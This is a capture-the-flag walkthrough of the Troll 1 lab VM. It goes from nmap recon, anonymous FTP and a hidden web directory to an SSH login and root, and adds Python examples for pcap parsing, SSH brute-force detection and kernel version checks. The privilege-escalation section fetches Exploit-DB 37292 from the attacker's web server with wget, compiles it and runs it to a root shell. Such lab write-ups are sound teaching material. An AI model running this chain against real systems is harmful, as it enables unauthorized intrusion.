Friday, July 26, 2019

Troll 1 Walkthrough

Recon / Enumeration:

Using nmap -A -sV (version detection) -sC (default NSE scripts) 192.168.1.95:

Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-25 20:38 PDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 5.19% done; ETC: 20:38 (0:00:18 remaining)
Nmap scan report for 192.168.1.95
Host is up (0.00054s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 10  2014 lol.pcap [NSE: writeable]
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 192.168.1.88
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 600
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|   256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_  256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:7D:BA:0F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.1.95

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.13 seconds

I see that robots.txt on the site lists a disallowed /secret directory.

Port 80 is also open, so there is a web server to look at.

We can also see that the FTP server has anonymous login enabled.

Let's see where this can lead us.

Here are my findings.

I need to run get lol.pcap to pull the file off the FTP server.

Once we have the file, we open it in Wireshark and apply ftp-data as the display filter.

We will get a message output like this:

Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P

Sucks, you were so close... gotta TRY HARDER!
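The ftp-data step above can also be done without Wireshark. The following is an added example, not code from the original post: a small pure-Python reader for classic pcap files that keeps the TCP segments on the active-mode FTP data port (20) and joins their payloads, which is what the ftp-data display filter shows for a capture like lol.pcap. The capture it parses is constructed inline (the control-channel lines, the two data-channel segments and a bare ACK are made up for the test); it does not ship the box's lol.pcap, and a passive-mode transfer would need the ephemeral port negotiated in the PASV reply passed as data_port instead.

```python
"""Pull FTP data-channel payloads out of a pcap without Wireshark.
Added example; the capture below is constructed test data, not the box's lol.pcap."""
import struct

PCAP_MAGIC_US = 0xA1B2C3D4   # microsecond timestamps
PCAP_MAGIC_NS = 0xA1B23C4D   # nanosecond timestamps (same record layout)
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_DATA_PORT = 20           # active-mode data channel; passive mode uses an ephemeral port


def pcap_records(data: bytes):
    """Yield (ts_sec, frame_bytes) for each record of a classic (non-pcapng) Ethernet pcap."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic in (PCAP_MAGIC_US, PCAP_MAGIC_NS):
        endian = "<"
    elif magic in (0xD4C3B2A1, 0x4D3CB2A1):
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack(endian + "I", data[20:24])[0]
    if linktype != 1:
        raise ValueError(f"only Ethernet captures are handled, got linktype {linktype}")
    offset = 24
    while offset + 16 <= len(data):
        ts_sec, _frac, incl_len, _orig_len = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        frame = data[offset:offset + incl_len]
        if len(frame) < incl_len:
            break  # truncated record at end of file: stop rather than mis-parse
        offset += incl_len
        yield ts_sec, frame


def _ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def tcp_segment(frame: bytes):
    """Return (src, sport, dst, dport, payload) for an Ethernet/IPv4/TCP frame, or None."""
    if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
        return None
    ip = frame[14:]
    ver_ihl, _tos, total_len, _id, _frag, _ttl, proto, _csum, src, dst = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    if ver_ihl >> 4 != 4 or proto != IPPROTO_TCP:
        return None
    tcp = ip[(ver_ihl & 0x0F) * 4:total_len]   # honour IP options, drop Ethernet padding
    if len(tcp) < 20:
        return None
    sport, dport, _seq, _ack, off, _flags, _win, _csum, _urg = struct.unpack("!HHIIBBHHH", tcp[:20])
    return _ip_str(src), sport, _ip_str(dst), dport, tcp[(off >> 4) * 4:]


def ftp_data_payloads(pcap_bytes: bytes, data_port: int = FTP_DATA_PORT):
    """Equivalent of the ftp-data filter for active mode: non-empty payloads to/from data_port."""
    out = []
    for _ts, frame in pcap_records(pcap_bytes):
        seg = tcp_segment(frame)
        if seg and seg[4] and data_port in (seg[1], seg[3]):
            out.append(seg)
    return out


def ftp_data_text(pcap_bytes: bytes) -> str:
    """Join the data-channel payloads (a one-way transfer, so capture order is enough)."""
    return b"".join(seg[4] for seg in ftp_data_payloads(pcap_bytes)).decode("utf-8", "replace")


# --- constructed sample capture (checksums left zero; test data only) ---
def _frame(src, sport, dst, dport, payload: bytes) -> bytes:
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, IPPROTO_TCP, 0,
                     bytes(int(o) for o in src.split(".")), bytes(int(o) for o in dst.split("."))) + tcp
    return b"\x02" * 6 + b"\x04" * 6 + struct.pack("!H", ETHERTYPE_IPV4) + ip


def build_pcap(frames) -> bytes:
    header = struct.pack("<IHHiIII", PCAP_MAGIC_US, 2, 4, 0, 0, 65535, 1)
    return header + b"".join(struct.pack("<IIII", 1407700000 + i, 0, len(f), len(f)) + f
                             for i, f in enumerate(frames))


SAMPLE_PCAP = build_pcap([
    _frame("192.168.1.88", 40001, "192.168.1.95", 21, b"RETR secret_stuff.txt\r\n"),   # control channel
    _frame("192.168.1.95", 21, "192.168.1.88", 40001, b"150 Opening BINARY mode data connection.\r\n"),
    _frame("192.168.1.95", 20, "192.168.1.88", 40002, b"Well, well, well, aren't you just a clever little devil, "
                                                     b"you almost found the sup3rs3cr3tdirlol :-P\n"),
    _frame("192.168.1.95", 20, "192.168.1.88", 40002, b"\nSucks, you were so close... gotta TRY HARDER!\n"),
    _frame("192.168.1.88", 40002, "192.168.1.95", 20, b""),                            # bare ACK, no data
])

if __name__ == "__main__":
    print(ftp_data_text(SAMPLE_PCAP))
```

Only the classic pcap format is handled; a pcapng capture (the default for recent Wireshark versions) has a block-based layout and would need a different reader.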

So, let's try using http://192.168.1.95/sup3rs3cr3tdirlol and see what we get back.


We see an interesting file inside the super secret directory.

roflmao

Once downloaded, we can see that it is an executable file.

root@kali:~/Downloads# chmod 777 roflmao
root@kali:~/Downloads# ./roflmao
Find address 0x0856BF to proceedroot@kali:~/Downloads#

The binary prints 0x0856BF as the address.

Let's see where this address can be used.

Let's try it as a path in the URL.

http://192.168.1.95/0x0856BF/

In there we find some things that would be great for SSH access.

Let's put these into hydra to test things out. None of the users on the list worked automatically with hydra, so I had to try manually with:

ssh overflow@192.168.1.95

The password is actually Pass.txt.
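From the defender's side, the burst of guesses that hydra produces and the eventual successful login both land in the target's auth.log. The following is an added example, not from the original post, of the detection logic a log-monitoring rule would encode: it parses sshd "Failed/Accepted password" lines, counts failures per source IP in a sliding window, and raises a higher-priority alert when a success follows a burst of failures. The log lines, host name troll, PIDs and the 10.0.0.5 source are constructed sample data.

```python
"""Flag SSH password guessing in sshd auth.log lines (added example, not from the original post)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH password-auth outcomes as they appear in syslog-style auth.log lines
LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2$"
)


def parse_line(line: str, year: int = 2019):
    """Return a dict for an sshd password-auth line, or None for anything else.
    Syslog timestamps carry no year, so the caller supplies one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "user": m["user"], "ip": m["ip"]}


def detect_password_guessing(lines, threshold=5, window=timedelta(seconds=60), year=2019):
    """Sliding-window detector: alert once per source IP when `threshold` failures land
    inside `window`, and again if a login from that IP then succeeds inside the window."""
    recent = defaultdict(list)    # ip -> failure timestamps still inside the window
    tried = defaultdict(set)      # ip -> user names attempted from that source
    flagged = set()
    alerts = []
    for line in lines:
        ev = parse_line(line, year)
        if ev is None:
            continue
        ip, now = ev["ip"], ev["ts"]
        recent[ip] = [t for t in recent[ip] if now - t <= window]   # expire old failures
        if ev["result"] == "Failed":
            recent[ip].append(now)
            tried[ip].add(ev["user"])
            if len(recent[ip]) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"type": "password_guessing", "ip": ip, "at": now,
                               "count": len(recent[ip]), "users": sorted(tried[ip])})
        elif recent[ip]:   # Accepted right after a burst of failures: the one to page on
            alerts.append({"type": "success_after_failures", "ip": ip, "at": now,
                           "user": ev["user"], "failures": len(recent[ip])})
    return alerts


# Constructed sample log: a guessing burst, a success, and one benign failure elsewhere.
SAMPLE_AUTH_LOG = """\
Jul 25 22:10:01 troll sshd[2301]: Failed password for invalid user admin from 192.168.1.88 port 45110 ssh2
Jul 25 22:10:03 troll sshd[2303]: Failed password for invalid user guest from 192.168.1.88 port 45112 ssh2
Jul 25 22:10:05 troll sshd[2305]: Failed password for root from 192.168.1.88 port 45114 ssh2
Jul 25 22:10:07 troll sshd[2307]: Failed password for overflow from 192.168.1.88 port 45116 ssh2
Jul 25 22:10:09 troll sshd[2309]: Failed password for overflow from 192.168.1.88 port 45118 ssh2
Jul 25 22:10:11 troll sshd[2311]: Failed password for overflow from 192.168.1.88 port 45120 ssh2
Jul 25 22:10:20 troll sshd[2313]: Accepted password for overflow from 192.168.1.88 port 45122 ssh2
Jul 25 22:10:20 troll sshd[2313]: pam_unix(sshd:session): session opened for user overflow by (uid=0)
Jul 25 22:15:00 troll sshd[2350]: Failed password for alice from 10.0.0.5 port 51000 ssh2
""".splitlines()

if __name__ == "__main__":
    for alert in detect_password_guessing(SAMPLE_AUTH_LOG):
        print(alert)
```

The threshold and window are tuning knobs: a low threshold catches slow guessing but also users who mistype, which is why the success-after-failures alert is the one worth acting on first.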

So, now, it's time for privilege escalation.

Let's now try privilege escalation through a kernel exploit.

We can enumerate the Ubuntu release and kernel version of the system and then look for an exploit that matches.

$ lsb_release -a
No LSB modules are available.
Distributor ID:    Ubuntu
Description:    Ubuntu 14.04.1 LTS
Release:    14.04
Codename:    trusty

$ uname -a
Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux

It looks like we need an exploit matching Linux kernel 3.13.0-32, i.e. one covering the 3.13.0 < 3.19 range.
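Matching the kernel to an affected range is the same check a patch-compliance script makes on the defending side. The following is an added example, not from the original post: it parses the release string from uname, tests it against the half-open upstream range the post quotes (3.13.0 up to but not including 3.19), and applies the caveat that distro kernels backport fixes without changing the upstream number, so a release inside the range is only likely affected unless the vendor's fixed ABI number says otherwise. The fixed_abi parameter is hypothetical (the value 55 in the demo call is a placeholder, not a real advisory number) and would come from the distribution's security notice.

```python
"""Decide whether a reported kernel release falls in an affected upstream version range
(added example, not from the original post)."""
import re

# "3.13.0-32-generic" -> upstream version 3.13.0, distro ABI/build number 32
RELEASE_RE = re.compile(r"^(?P<ver>\d+\.\d+\.\d+)(?:-(?P<abi>\d+))?(?:[-.].*)?$")


def parse_kernel_release(release: str):
    """Return (version_tuple, abi_or_None) for a `uname -r` string."""
    m = RELEASE_RE.match(release.strip())
    if not m:
        raise ValueError(f"unrecognised kernel release: {release!r}")
    version = tuple(int(x) for x in m["ver"].split("."))
    abi = int(m["abi"]) if m["abi"] is not None else None
    return version, abi


def release_from_uname_a(line: str) -> str:
    """Pull the release field out of a full `uname -a` line (third whitespace-separated field)."""
    fields = line.split()
    if len(fields) < 3:
        raise ValueError("not a uname -a line")
    return fields[2]


def assess(release: str, low: str = "3.13.0", high: str = "3.19.0", fixed_abi=None):
    """Classify a kernel against a half-open upstream range [low, high).

    Distributions backport fixes without bumping the upstream version, so a version
    inside the range is only *likely* affected. If the caller supplies the ABI number
    at which the distro shipped the fix (fixed_abi, a hypothetical parameter taken from
    the vendor advisory; no real value is assumed here), the ABI decides: at or above
    it the backport is present."""
    version, abi = parse_kernel_release(release)
    lo = tuple(int(x) for x in low.split("."))
    hi = tuple(int(x) for x in high.split("."))
    result = {"release": release, "version": version, "abi": abi}
    if not (lo <= version < hi):
        result["verdict"] = "not_affected"
    elif fixed_abi is not None and abi is not None and abi >= fixed_abi:
        result["verdict"] = "backport_fixed"
    else:
        result["verdict"] = "likely_affected"
    return result


if __name__ == "__main__":
    uname_a = "Linux troll 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux"
    print(assess(release_from_uname_a(uname_a)))          # likely_affected (no fixed ABI known)
    print(assess("3.13.0-170-generic", fixed_abi=55))     # backport_fixed (55 is a placeholder value)
    print(assess("4.4.0-21-generic"))                     # not_affected
```

The point of the ABI check is that a version number alone is not proof either way: a box can report a kernel inside the affected range and still be patched, so the verdict should be confirmed against the vendor advisory before anything is concluded from it.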
Now, run cp /usr/share/exploitdb/exploits/linux/local/37292.c . to copy the exploit source into the current directory.

With the source gathered, we now need to get it onto the target and compile the C exploit there.

But first, we need to serve the directory containing the exploit from a Python web server on the attacking machine:

python -m SimpleHTTPServer 80

$ cd /tmp
$ ls
$ wget http://192.168.1.88/37292.c
--2019-07-25 22:47:41--  http://192.168.1.88/37292.c
Connecting to 192.168.1.88:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: ‘37292.c’

100%[======================================>] 5,119       --.-K/s   in 0s     

2019-07-25 22:47:41 (448 MB/s) - ‘37292.c’ saved [5119/5119]

$ ls
37292.c
$ gcc 37292.c -o exploit
$ ls
37292.c  exploit
$ ./exploit
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cd /root
# ls
proof.txt
# cat proof.txt

Good job, you did it!

702a8c18d29c6f3ca0d99ef5712bfbdc

Finally, r00ted this box and I am in. :)

Yes, I am mad, TROLL! :) lol.
